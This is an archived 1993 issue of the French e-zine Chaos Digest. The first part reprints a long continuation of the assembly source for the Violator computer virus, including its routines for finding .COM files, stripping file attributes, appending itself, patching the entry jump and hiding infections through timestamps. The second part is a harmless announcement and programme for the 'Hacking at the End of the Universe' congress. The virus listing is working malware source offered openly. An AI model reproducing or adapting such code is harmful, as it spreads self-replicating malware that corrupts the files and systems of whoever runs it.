home *** CD-ROM | disk | FTP | other *** search
/ HPAVC / HPAVC CD-ROM.iso / KAOS1_32.ZIP / KAOS1-32
Text File  |  1993-05-21  |  27KB  |  733 lines

  1. Chaos Digest           Mercredi 19 Mai 1993        Volume 1 : Numero 32
  2.                           ISSN  1244-4901
  3.  
  4.        Editeur: Jean-Bernard Condat (jbcondat@attmail.com)
  5.        Archiviste: Yves-Marie Crabbe
  6.        Co-Redacteurs: Arnaud Bigare, Stephane Briere
  7.  
  8. TABLE DES MATIERES, #1.32 (19 Mai 1993)
  9. File 1--40H VMag Issue 1 Volume 2 #011(3) (reprint)
  10. File 2--_Hacking at the End of the Universe_ (congres)
  11.  
  12. Chaos Digest is a weekly electronic journal/newsletter. Subscriptions are
  13. available at no cost by sending a message to:
  14.                 linux-activists-request@niksula.hut.fi
  15. with a mail header or first line containing the following informations:
  16.                     X-Mn-Admin: join CHAOS_DIGEST
  17.  
  18. The editors may be contacted by voice (+33 1 47874083), fax (+33 1 47877070)
  19. or S-mail at: Jean-Bernard Condat, Chaos Computer Club France [CCCF], B.P.
  20. 155, 93404 St-Ouen Cedex, France.  He is a member of the EICAR and EFF (#1299)
  21. groups.
  22.  
  23. Issues of ChaosD can also be found on some French BBS.  Back issues of
  24. ChaosD can be found on the Internet as part of the Computer underground
  25. Digest archives.  They're accessible using anonymous FTP from:
  26.  
  27.         * kragar.eff.org [192.88.144.4] in /pub/cud/chaos
  28.         * uglymouse.css.itd.umich.edu [141.211.182.53] in /pub/CuD/chaos
  29.         * halcyon.com [192.135.191.2] in /pub/mirror/cud/chaos
  30.         * ftp.cic.net [192.131.22.2] in /e-serials/alphabetic/c/chaos-digest
  31.         * ftp.ee.mu.oz.au [128.250.77.2] in /pub/text/CuD/chaos
  32.         * nic.funet.fi [128.214.6.100] in /pub/doc/cud/chaos
  33.         * orchid.csv.warwick.ac.uk [137.205.192.5] in /pub/cud/chaos
  34.  
  35. CHAOS DIGEST is an open forum dedicated to sharing French information among
  36. computerists and to the presentation and debate of diverse views. ChaosD
  37. material may be reprinted for non-profit as long as the source is cited.
  38. Some authors do copyright their material, and they should be contacted for
  39. reprint permission.  Readers are encouraged to submit reasoned articles in
  40. French, English or German languages relating to computer culture and
  41. telecommunications.  Articles are preferred to short responses.  Please
  42. avoid quoting previous posts unless absolutely necessary.
  43.  
  44. DISCLAIMER: The views represented herein do not necessarily represent
  45.             the views of the moderators. Chaos Digest contributors
  46.             assume all responsibility for ensuring that articles
  47.             submitted do not violate copyright protections.
  48.  
  49. ----------------------------------------------------------------------
  50.  
  51. Date: Tue May 11 09:24:40 PDT 1993
  52. From: 0005847161@mcimail.com (American_Eagle_Publication_Inc. )
  53. Subject: File 1--40H VMag Issue 1 Volume 2 #011(3) (reprint)
  54.  
  55.  
  56. [suite du listing du virus Violator]
  57.  
  58. slash_ok:
  59.         MOV     [BX+nam_ptr],DI   ;Move the filename into workspace
  60.         MOV     SI,BX             ;Restore the original SI value
  61.         ADD     SI,f_spec         ;Point to COM file victim
  62.         MOV     CX,6
  63.         REPZ    MOVSB             ;Move victim into workspace
  64.         MOV     SI,BX
  65.         MOV     AH,4EH
  66.         MOV     DX,wrk_spc
  67.         ADD     DX,SI             ;DX is ... THE VICTIM!!!
  68.         MOV     CX,3              ;Attributes of Read Only or Hidden OK
  69.         INT     21H
  70.         JMP     SHORT   find_first
  71.  
  72. find_next:
  73.         MOV     AH,4FH
  74.         INT     21H
  75.  
  76. find_first:
  77.         JNB     found_file        ;Jump if we found it
  78.         JMP     SHORT   set_subdir;Otherwise, get another subdirectory
  79.  
  80. found_file:
  81.         MOV     AX,[SI+dta_tim]   ;Get time from DTA
  82.         AND     AL,1EH            ;Mask to remove all but seconds
  83.         CMP     AL,1EH            ;60 seconds
  84.         JZ      find_next
  85.         CMP     WORD PTR [SI+dta_len],OFFSET 0FA00H ;Is the file too long?
  86.         JA      find_next               ;If too long, find another one
  87.         CMP     WORD PTR [SI+dta_len],0AH ;Is it too short?
  88.         JB      find_next         ;Then go find another one
  89.         MOV     DI,[SI+nam_ptr]
  90.         PUSH    SI
  91.         ADD     SI,dta_nam
  92.  
  93. more_chars:
  94.         LODSB
  95.         STOSB
  96.         CMP     AL,0
  97.         JNZ     more_chars
  98.         POP     SI
  99.         MOV     AX,OFFSET 4300H
  100.         MOV     DX,wrk_spc
  101.         ADD     DX,SI
  102.         INT     21H
  103.         MOV     [SI+old_att],CX
  104.         MOV     AX,OFFSET 4301H
  105.         AND     CX,OFFSET 0FFFEH
  106.         MOV     DX,wrk_spc
  107.         ADD     DX,SI
  108.         INT     21H
  109.         MOV     AX,OFFSET 3D02H
  110.         MOV     DX,wrk_spc
  111.         ADD     DX,SI
  112.         INT     21H
  113.         JNB     opened_ok
  114.         JMP     fix_attr
  115.  
  116. opened_ok:
  117.         MOV     BX,AX
  118.         MOV     AX,OFFSET 5700H
  119.         INT     21H
  120.         MOV     [SI+old_tim],CX         ;Save file time
  121.         MOV     [SI+ol_date],DX         ;Save the date
  122.         MOV     AH,2CH
  123.         INT     21H
  124.         AND     DH,7
  125.         JMP     infect
  126.  
  127. infect:
  128.         MOV     AH,3FH
  129.         MOV     CX,3
  130.         MOV     DX,first_3
  131.         ADD     DX,SI
  132.         INT     21H             ;Save first 3 bytes into the data area
  133.         JB      fix_time_stamp
  134.         CMP     AX,3
  135.         JNZ     fix_time_stamp
  136.         MOV     AX,OFFSET 4202H
  137.         MOV     CX,0
  138.         MOV     DX,0
  139.         INT     21H
  140.         JB      fix_time_stamp
  141.         MOV     CX,AX
  142.         SUB     AX,3
  143.         MOV     [SI+jmp_dsp],AX
  144.         ADD     CX,OFFSET c_len_y
  145.         MOV     DI,SI
  146.         SUB     DI,OFFSET c_len_x
  147.  
  148.         MOV     [DI],CX
  149.         MOV     AH,40H
  150.         MOV_CX  virlen
  151.         MOV     DX,SI
  152.         SUB     DX,OFFSET codelen
  153.         INT     21H
  154.         JB      fix_time_stamp
  155.         CMP     AX,OFFSET virlen
  156.         JNZ     fix_time_stamp
  157.         MOV     AX,OFFSET 4200H
  158.         MOV     CX,0
  159.         MOV     DX,0
  160.         INT     21H
  161.         JB      fix_time_stamp
  162.         MOV     AH,40H
  163.         MOV     CX,3
  164.         MOV     DX,SI
  165.         ADD     DX,jmp_op
  166.         INT     21H
  167.  
  168. fix_time_stamp:
  169.         MOV     DX,[SI+ol_date]
  170.         MOV     CX,[SI+old_tim]
  171.         AND     CX,OFFSET 0FFE0H
  172.         OR      CX,1EH
  173.         MOV     AX,OFFSET 5701H
  174.         INT     21H
  175.         MOV     AH,3EH
  176.         INT     21H
  177.  
  178. fix_attr:
  179.         MOV     AX,OFFSET 4301H
  180.         MOV     CX,[SI+old_att]
  181.         MOV     DX,wrk_spc
  182.         ADD     DX,SI
  183.         INT     21H
  184.  
  185. all_done:
  186.         PUSH    DS
  187.         MOV     AH,1AH
  188.         MOV     DX,[SI+old_dta]
  189.         MOV     DS,[SI+old_dts]
  190.         INT     21H
  191.         POP     DS
  192.  
  193. quit:
  194.         POP     CX
  195.         XOR     AX,AX              ;XOR values so that we will give the
  196.         XOR     BX,BX              ;poor sucker a hard time trying to
  197.         XOR     DX,DX              ;reassemble the source code if he
  198.         XOR     SI,SI              ;decides to dissassemble us.
  199.         MOV     DI,OFFSET 0100H
  200.         PUSH    DI
  201.         XOR     DI,DI
  202.         RET     0FFFFH             ;Return back to the beginning
  203.                                    ;of the program
  204.  
  205. vir_dat EQU     $
  206.  
  207. intro   db      '.D$^i*&B)_a.%R',13,10
  208. olddta_ DW      0
  209. olddts_ DW      0
  210. oldtim_ DW      0
  211. count_  DW      0
  212. cntr    DB                         ;Drive to nuke from (C:+++)
  213. oldate_ DW      0
  214. oldatt_ DW      0
  215. first3_ EQU     $
  216.         INT     20H
  217.         NOP
  218. jmpop_  DB      0E9H
  219. jmpdsp_ DW      0
  220. fspec_  DB      '*.COM',0
  221. pathad_ DW      0
  222. namptr_ DW      0
  223. envstr_ DB      'PATH='
  224. wrkspc_ DB      40h dup (0)
  225. dta_    DB      16h dup (0)
  226. dtatim_ DW      0,0
  227. dtalen_ DW      0,0
  228. dtanam_ DB      0Dh dup (0)
  229. lst_byt EQU     $
  230. virlen  =       lst_byt - v_start
  231. codelen =       vir_dat - v_start
  232. c_len_x =       vir_dat - v_start - 2
  233. c_len_y =       vir_dat - v_start + 100H
  234. old_dta =       olddta_ - vir_dat
  235. old_dts =       olddts_ - vir_dat
  236. old_tim =       oldtim_ - vir_dat
  237. ol_date =       oldate_ - vir_dat
  238. old_att =       oldatt_ - vir_dat
  239. first_3 =       first3_ - vir_dat
  240. jmp_op  =       jmpop_  - vir_dat
  241. jmp_dsp =       jmpdsp_ - vir_dat
  242. f_spec  =       fspec_  - vir_dat
  243. path_ad =       pathad_ - vir_dat
  244. nam_ptr =       namptr_ - vir_dat
  245. env_str =       envstr_ - vir_dat
  246. wrk_spc =       wrkspc_ - vir_dat
  247. dta     =       dta_    - vir_dat
  248. dta_tim =       dtatim_ - vir_dat
  249. dta_len =       dtalen_ - vir_dat
  250. dta_nam =       dtanam_ - vir_dat
  251. count   =       count_  - vir_dat
  252.  
  253.         CODE    ENDS
  254. END     VCODE
  255.  
  256. ------------------------------
  257.  
  258. Date: Thu May 20 17:55:14 GMT 1993
  259. From: heu@hacktic.nl (Announcement posting account )
  260. Subject: File 2--_Hacking at the End of the Universe_ (congres)
  261.  
  262.  
  263. =========================================================================
  264.         Hack-Tic presents
  265.  
  266.  
  267.                                H A C K I N G
  268.  
  269.                           at the   E N D   of the
  270.  
  271.                               U N I V E R S E
  272.  
  273.  
  274.                    1993 SUMMER CONGRESS, THE NETHERLANDS
  275. =========================================================================
  276.  
  277. H E U ?
  278. +-------
  279.  
  280. Remember the Galactic Hacker Party back in 1989? Ever wondered what
  281. happened to the people behind it? We sold out to big business, you
  282. think. Think again, we're back!
  283.  
  284. That's right. On august 4th, 5th and 6th 1993, we're organising a
  285. three-day summer congress for hackers, phone phreaks, programmers,
  286. computer haters, data travellers, electro-wizards, networkers, hardware
  287. freaks, techno-anarchists, communications junkies, cyberpunks, system
  288. managers, stupid users, paranoid androids, Unix gurus, whizz kids, warez
  289. dudes, law enforcement officers (appropriate undercover dress required),
  290. guerilla heating engineers and other assorted bald, long-haired and/or
  291. unshaven scum. And all this in the middle of nowhere (well, the middle
  292. of Holland, actually, but that's the same thing) at the Larserbos
  293. campground four metres below sea level.
  294.  
  295. The three days will be filled with lectures, discussions and workshops
  296. on hacking, phreaking, people's networks, Unix security risks, virtual
  297. reality, semafun, social engineering, magstrips, lockpicking,
  298. virusses, paranoia, legal sanctions against hacking in Holland and
  299. elsewhere and much, much more. English will be the lingua franca for
  300. this event, although one or two workshops may take place in Dutch.
  301. There will be an Internet connection, an intertent ethernet and social
  302. interaction (both electronic and live). Included in the price are four
  303. nights in your own tent. Also included are inspiration, transpiration, a
  304. shortage of showers (but a lake to swim in), good weather (guaranteed by
  305. god), campfires and plenty of wide open space and fresh air. All of this
  306. for only 100 dutch guilders (currently around US$70).
  307.  
  308. We will also arrange for the availability of food, drink and smokes of
  309. assorted types, but this is not included in the price. Our bar will be
  310. open 24 hours a day, as well as a guarded depository for valuables
  311. (like laptops, cameras etc.). You may even get your stuff back! For
  312. people with no tent or air matress: you can buy a tent through us for
  313. 100 guilders, a matress costs 10 guilders. You can arrive from 17:00
  314. (that's five p.m. for analogue types) on August 3rd. We don't have to
  315. vacate the premises until 12:00 noon on Saturday, August 7 so you can
  316. even try to sleep through the devastating Party at the End of Time
  317. (PET) on the closing night (live music provided). We will arrange for
  318. shuttle buses to and from train stations in the vicinity.
  319.  
  320.  
  321. H O W ?
  322. +-------
  323.  
  324. Payment: in advance please. Un-organized, poor techno-freaks like us
  325. would like to get to the Bahamas at least once. We can only guarantee
  326. you a place if you pay before Friday June 25th, 1993. If you live in
  327. Holland, just transfer fl. 100 to giro 6065765 (Hack-Tic) and mention
  328. 'HEU' and your name. If you're in Germany, pay DM 100,- to Hack-Tic,
  329. Konto 2136638, Sparkasse Bielefeld, BLZ 48050161. If you live elsewhere:
  330. call, fax or e-mail us for the best way to get the money to us from your
  331. country. We accept American Express, we do NOT cash ANY foreign cheques.
  332.  
  333.  
  334. H A !
  335. +-----
  336.  
  337. Very Important: Bring many guitars and laptops.
  338.  
  339.  
  340. M E ?
  341. +-----
  342.  
  343. Yes, you! Busloads of alternative techno-freaks from all over the
  344. planet will descend on this event. You wouldn't want to miss that,
  345. now, would you?
  346.  
  347. Maybe you are part of that select group that has something special to
  348. offer! Participating in 'Hacking at the End of the Universe' is
  349. exciting, but organising your very own part of it is even more fun. We
  350. already have a load of interesting workshops and lectures scheduled,
  351. but we're always on the lookout for more. We're also still in the
  352. market for people who want to help us organize during the congress.
  353.  
  354. In whatever way you wish to participate, call, write, e-mail or fax us
  355. soon, and make sure your money gets here on time. Space is limited.
  356.  
  357.  
  358. S O :
  359. +-----
  360.  
  361. - 4th, 5th and 6th of August
  362.  
  363. - Hacking at the End of the Universe
  364.   (a hacker summer congress)
  365.  
  366. - ANWB groepsterrein Larserbos
  367.   Zeebiesweg 47
  368.   8219 PT  Lelystad
  369.   The Netherlands
  370.  
  371. - Cost: fl. 100,- (+/- 70 US$) per person
  372.   (including 4 nights in your own tent)
  373.  
  374.  
  375. M O R E   I N F O :
  376. +-------------------
  377.  
  378. Hack-Tic
  379. Postbus 22953
  380. 1100 DL  Amsterdam
  381. The Netherlands
  382.  
  383. tel     : +31 20 6001480
  384. fax     : +31 20 6900968
  385. E-mail  : heu@hacktic.nl
  386.  
  387.  
  388. V I R U S :
  389. +-----------
  390.  
  391. If you know a forum or network that you feel this message belongs on,
  392. by all means slip it in. Echo-areas, your favorite bbs, /etc/motd, IRC,
  393. WP.BAT, you name it. Spread the worm, uh, word.
  394.  
  395.  
  396. S C HE D U L E
  397. +--------------
  398.  
  399. day 0       August 3rd, 1993
  400. =====
  401. 16:00       You are welcome to set up your tent
  402. 19:00       Improvised Dinner
  403.  
  404. day 1       August 4th, 1993
  405. =====
  406. 11:00-12:00 Opening ceremony
  407. 12:00-13:30 Workshops
  408. 14:00-15:30 Workshops
  409. 15:30-19:00 'Networking for the Masses'     16:00-18:00 Workshops
  410. 19:00-21:00 Dinner
  411. 21:30-23:00 Workshops
  412.  
  413. day 2       August 5th, 1993
  414. =====
  415. 11:30-13:00 Workshops
  416. 14:00-17:00 Phreaking the Phone             14:00-17:00 Workshops
  417. 17:30-19:00 Workshops
  418. 19:00-21:00 Dinner
  419.  
  420. day 3       August 6th, 1993
  421. =====
  422. 11:30-13:00 Workshops
  423. 14:00-18:00 Hacking (and) The Law           14:00-17:00 Workshops
  424. 18:00-19:00 Closing ceremony
  425. 19:00-21:00 Barbeque
  426. 21:00-??:?? Party at the End of Time (Live Music)
  427.  
  428. day 4       August 7th, 1993
  429. =====
  430. 12:00       All good things come to an end
  431.  
  432.  
  433. 'Networking for the masses',   Wednesday August 4th 1993, 15:30
  434. +---------------------------------------------------------------
  435.  
  436. One of the main discussions at the 1989 Galactic Hacker Party focused on
  437. whether or not the alternative community should use computer networking.
  438. Many people felt a resentment against using a 'tool of oppression' for
  439. their own purposes. Computer technology was, in the eyes of many,
  440. something to be smashed rather than used.
  441.  
  442. Times have changed. Many who were violently opposed to using computers
  443. in 1989 have since discovered word-processing and desktop publishing.
  444. Even the most radical groups have replaced typewriters with PCs. The
  445. 'computer networking revolution' has begun to affect the alternative
  446. community.
  447.  
  448. Not all is well: many obstacles stand in the way of the 'free flow of
  449. information.' Groups with access to information pay such high prices for
  450. it that they are forced to sell information they'd prefer to pass on for
  451. free. Some low-cost alternative networks have completely lost their
  452. democratic structure. Is this the era of the digital dictator, or are we
  453. moving towards digital democracy?
  454.  
  455. To discuss these and other issues, we've invited the following people
  456. who are active in the field of computer networking: [Electronic mail
  457. addresses for each of the participants are shown in brackets.]
  458.  
  459. Ted Lindgreen (ted@nluug.nl) is managing director of nlnet. Nlnet is the
  460. largest commercial TCP/IP and UUCP network provider in the Netherlands.
  461.  
  462. Peter van der Pouw Kraan (peter@hacktic.nl) was actively involved in the
  463. squat-movement newsletters 'Bluf!' and 'NN' and has outspoken ideas
  464. about technology and its relation to society. Had a PC all the way back
  465. in 1985!
  466.  
  467. Maja van der Velden (maja@agenda.hacktic.nl) is from the Agenda
  468. Foundation which sets up and supports communication and information
  469. projects.
  470.  
  471. Joost Flint (joost@aps.hacktic.nl) is from the Activist Press Service.
  472. APS has a bbs and works to get alternative-media and pressure groups
  473. online.
  474.  
  475. Felipe Rodriquez (nonsenso@utopia.hacktic.nl) is from the Hack-Tic
  476. Network which grew out of the Dutch computer underground and currently
  477. connects thousands of people to the global Internet.
  478.  
  479. Andre Blum (zabkar@roana.hacktic.nl), is an expert in the field of
  480. wireless communications.
  481.  
  482. Eelco de Graaff (Eelco.de.Graaff@p5.f1.n281.z2.fidonet.org) is the
  483. nethost of net 281 of FidoNet, EchoMail troubleshooter, and one of the
  484. founders of the Dutch Fidonet Foundation.
  485.  
  486. Michael Polman (michael@antenna.nl) of the Antenna foundation is a
  487. consultant in the field of international networking. He specialises in
  488. non-governmental networks in the South.
  489.  
  490. Alfred Heitink (alfred@antenna.nl) is a social scientist specializing in
  491. the field of computer-mediated communication as well as system manager at
  492. the Dutch Antenna host.
  493.  
  494. Rena Tangens (rena@bionic.zer.de), was involved in the creation of the
  495. Bionic Mailbox in Bielefeld (Germany) and the Zerberus mailbox network.
  496. She is an artist and wants to combine art and technology.
  497.  
  498. The discussion will be led by freelance radiomaker and science
  499. journalist Herbert Blankesteyn. He was involved in the 'Archie'
  500. children's bbs of the Dutch VPRO broadcasting corporation.
  501.  
  502.  
  503. 'Phreaking the Phone',   Thursday August 5th 1993, 14:00
  504. +--------------------------------------------------------
  505.  
  506. Your own telephone may have possibillities you never dreamed possible.
  507. Many years ago people discovered that one could fool the telephone
  508. network into thinking you were part of the network and not just a
  509. customer. As a result, one could make strange and sometimes free
  510. phonecalls to anywhere on the planet. A subculture quickly formed.
  511.  
  512. The phone companies got wise and made a lot of things (nearly)
  513. impossible. What is still possible today? What is still legal today?
  514. What can they do about it? What are they doing about it?
  515.  
  516. Billsf (bill@tech.hacktic.nl) and M. Tillman, a few of the worlds best
  517. phreaks, will introduce the audience to this new world. Phone phreaks
  518. from many different countries will exchange stories of succes and
  519. defeat. Your life may never be the same.
  520.  
  521.  
  522. 'Hacking (and) The Law',   Friday August 6th, 14:00
  523. +---------------------------------------------------
  524.  
  525. You can use your own computer and modem to access some big computer
  526. system at a university without the people owning that computer knowing
  527. about it. For years this activity was more or less legal in Holland: if
  528. you were just looking around on the Internet and didn't break anything
  529. nobody really cared too much...
  530.  
  531. That is, until shortly before the new computer crime law went into
  532. effect. Suddenly computer hackers were portrayed as evil 'crashers'
  533. intent on destroying systems or, at least, looking into everyone's
  534. files.
  535.  
  536. The supporters of the new law said that it was about time something was
  537. done about it. Critics of the law say it's like hunting mosquitoes with
  538. a machine-gun. They claim the aforementioned type of hacking is not the
  539. real problem and that the law is excessively harsh.
  540.  
  541. To discuss these issues we've invited a panel of experts, some of whom
  542. are, or have been, in touch with the law in one way or another.
  543.  
  544. Harry Onderwater (fridge@cri.hacktic.nl), is technical EDP auditor at the
  545. Dutch National Criminal Intelligence Service (CRI) and is responsible for
  546. combatting computer crime in the Netherlands. He says he's willing to
  547. arrest hackers if that is what it takes to make computer systems secure.
  548.  
  549. Prof. Dr. I.S. (Bob) Herschberg (herschbe@dutiws.twi.tudelft.nl), gained
  550. a hacker's control over his first system 21 years ago and never ceased
  551. the good work. Now lecturing, teaching and publishing on computer
  552. insecurity and imprivacy at the technical university in Delft. His
  553. thesis: 'penetrating a system is not perpetrating a crime'.
  554.  
  555. Ronald 'RGB' O. (rgb@utopia.hacktic.nl) has the distinction of being the
  556. only Dutch hacker arrested before and after the new law went into effect.
  557. He is a self-taught UNIX security expert and a writer for Hack-Tic
  558. Magazine.
  559.  
  560. Ruud Wiggers (ruudw@cs.vu.nl), system manager at the Free University
  561. (VU) in Amsterdam, has for 10 years been trying to plug holes in system
  562. security. He was involved in the RGB arrest.
  563.  
  564. Andy Mueller-Maguhn (andy@cccbln.ccc.de) is from the Chaos Computer Club
  565. in Germany.
  566.  
  567. Eric Corley (emmanuel@eff.org) a.k.a. Emmanuel Goldstein is editor
  568. of the hacker publication '2600 magazine'. The first person to realize
  569. the huge implications of the government crackdown on hackers in the US.
  570.  
  571. Winn Schwartau (wschwartau@mcimail.com) is a commercial computer
  572. security advisor as well as the author of the book 'Terminal
  573. Compromise'. His new book entitled 'Information Warfare' has just been
  574. released.
  575.  
  576. Ray Kaplan (kaplan@bpa.arizona.edu) is a computer security consultant.
  577. He is constantly trying to bridge the gap between hackers and the
  578. computer industry. He organizes 'meet the enemy' sessions where system
  579. managers can teleconference with hackers.
  580.  
  581. Wietse Venema (wietse@wzv.win.tue.nl) is a systems expert at the
  582. Technical University in Eindhoven. He is the author of some very well
  583. known utilities to monitor hacking on unix systems. He has a healthy
  584. suspicion of anything technical.
  585.  
  586. Peter Klerks (klerks@rulfsw.leidenuniv.nl) is a scientist at the centre
  587. for the study of social antagonism at the Leiden University. He has
  588. studied the Dutch police force extensively, and is author of the book
  589. 'Counterterrorism in the Netherlands.'
  590.  
  591. Don Stikvoort (stikvoort@surfnet.nl), one of the computer security
  592. experts for the Dutch Academic Society and chairman of CERT-NL (Computer
  593. Emergency Response Team). He is also actively involved in SURFnet
  594. network management.
  595.  
  596. Rop Gonggrijp (rop@hacktic.nl) was involved in some of the first
  597. computer break-ins in the Netherlands during the 80's and is now editor
  598. of Hack-Tic Magazine.
  599.  
  600. The discussion will be led by Franscisco van Jole (fvjole@hacktic.nl),
  601. journalist for 'De Volkskrant'.
  602.  
  603.  
  604. W O R K S H O P S
  605. +-----------------
  606.  
  607. HEUnet introduction
  608.    an introduction to the Hacking at the End of the Universe network.
  609.  
  610. Jumpstart to VR, 3D world-building on PC's
  611.    Marc Bennett, editor of Black Ice magazine, will explain how to
  612.    design worlds on your own PC which can be used in Virtual Reality
  613.    systems.
  614.  
  615. Replacing MS/DOS, Running UNIX on your own PC
  616.    People who are already running unix on their PCs will tell you what
  617.    unix has to offer and they'll talk about the different flavours in
  618.    cheap or free unix software available.
  619.  
  620. Unix security
  621.    RGB and fidelio have probably created more jobs in the unix security
  622.    business than the rest of the world put together. They'll talk about
  623.    some of the ins and outs of unix security.
  624.  
  625. E-mail networking
  626.    Should we destroy X400 or shall we let it destroy itself?
  627.  
  628. 'User Authorization Failure'
  629.    A quick introduction to the VAX/VMS Operating System for those that
  630.    consider a carreer in VMS security.
  631.  
  632. 'The right to keep a secret'
  633.    Encryption offers you the chance to really keep a secret, and
  634.    governments know it. They want you to use locks that they have the
  635.    key to. The fight is on!
  636.  
  637. 'Virus about to destroy the earth!'. Don't believe the hype!
  638.    What is the real threat of computer viruses? What technical
  639.    possibilities are there? Are we being tricked by a fear-machine that
  640.    runs on the money spent on anti-virus software?
  641.  
  642. 'It came out of the sky'
  643.    'Receiving pager information and what not to do with it'. Information
  644.    to pagers is sent through the air without encryption. Rop Gonggrijp
  645.    and Bill Squire demonstrate a receiver that picks it all up and
  646.    present some spooky scenarios describing what one could do with all
  647.    that information.
  648.  
  649. Cellular phones and cordless phones
  650.    How do these systems work, what frequencies do they use, and what are
  651.    the differences between different systems world-wide?
  652.  
  653. Zen and the art of lock-picking.
  654.    In this workshop The Key will let you play with cylinder locks of all
  655.    types and tell you of ingenious ways to open them.
  656.  
  657. "Doesn't mean they're not after you"
  658.    The secret services and other paranoia.
  659.  
  660. Audio Adventures
  661.    Steffen Wernery and Tim Pritlove talk about adventure games that you
  662.    play using a Touch Tone telephone.
  663.  
  664. Botanical Hacking (THC++)
  665.    Using computers, modems and other high tech to grow.
  666.  
  667. Wireless LAN (Data Radio)
  668.    How high a data rate can you pump through the air, and what is still
  669.    legal?
  670.  
  671. Social Engineering
  672.    The Dude, well known from his articles in Hack-Tic, will teach you
  673.    the basics of social engineering, the skill of manipulating people
  674.    within burocracies.
  675.  
  676. 'Hacking Plastic'
  677.    Tim and Billsf talk about the security risks in chip-cards, magnetic
  678.    cards, credit cards and the like.
  679.  
  680. Antenna Host Demo
  681.    The Antenna Foundation is setting up and supporting computer
  682.    networks, mainly in the South. They are operating a host system in
  683.    Nijmegen, The Netherlands, and they will demonstrate it in this
  684.    workshop, and talk about their activities.
  685.  
  686. APS Demo
  687.    APS (Activist Press Service) is operating a bbs in Amsterdam, The
  688.    Netherlands. You'll see it and will be able to play with it
  689.    'hands-on'.
  690.  
  691. 'Hocking the arts'
  692.    Benten and Marc Marc are computer artists. They present some of their
  693.    work under the motto: Hocking the arts, demystifying without losing
  694.    its magic contents.
  695.  
  696. Public Unix Demo
  697.    Demonstrating the Hack-Tic xs4all public unix, as well as other
  698.    public unix systems.
  699.  
  700. Packet Radio Demo
  701.    Showing the possiblities of existing radio amateur packet radio
  702.    equipment to transport packets of data over the airwaves.
  703.  
  704.  
  705. COMPUTERS AT 'HACKING AT THE END OF THE UNIVERSE'
  706. +-------------------------------------------------
  707.  
  708. This will get a little technical for those who want to know what we're
  709. going to set up. If you don't know much about computers, just bring
  710. whatever you have and we'll see how and if we can hook it up.
  711.  
  712. We're going to have ethernet connected to Internet (TCP/IP). You can
  713. connect by sitting down at one of our PC's or terminals, by hooking up
  714. your own equipment (we have a depository, so don't worry about theft),
  715. or by using one of our 'printerport <--> ethernet' adapters and
  716. hooking up laptops and notebooks that way. There may be a small fee
  717. involved here, we don't know what they're going to cost us. Contact us
  718. for details, also if you have a few of these adapters lying around.
  719. There might also be serial ports you can connect to using a nullmodem
  720. cable.
  721.  
  722. You can log in to our UNIX system(s) and send and receive mail and
  723. UseNet news that way. Every participant that wants one can get her/his
  724. own IP number to use worldwide. Users of the network are urged to make
  725. whatever files they have on their systems available to others over the
  726. ethernet. Bring anything that has a power cord or batteries and let's
  727. network it!
  728.  
  729. ------------------------------
  730.  
  731. End of Chaos Digest #1.32
  732. ************************************
  733.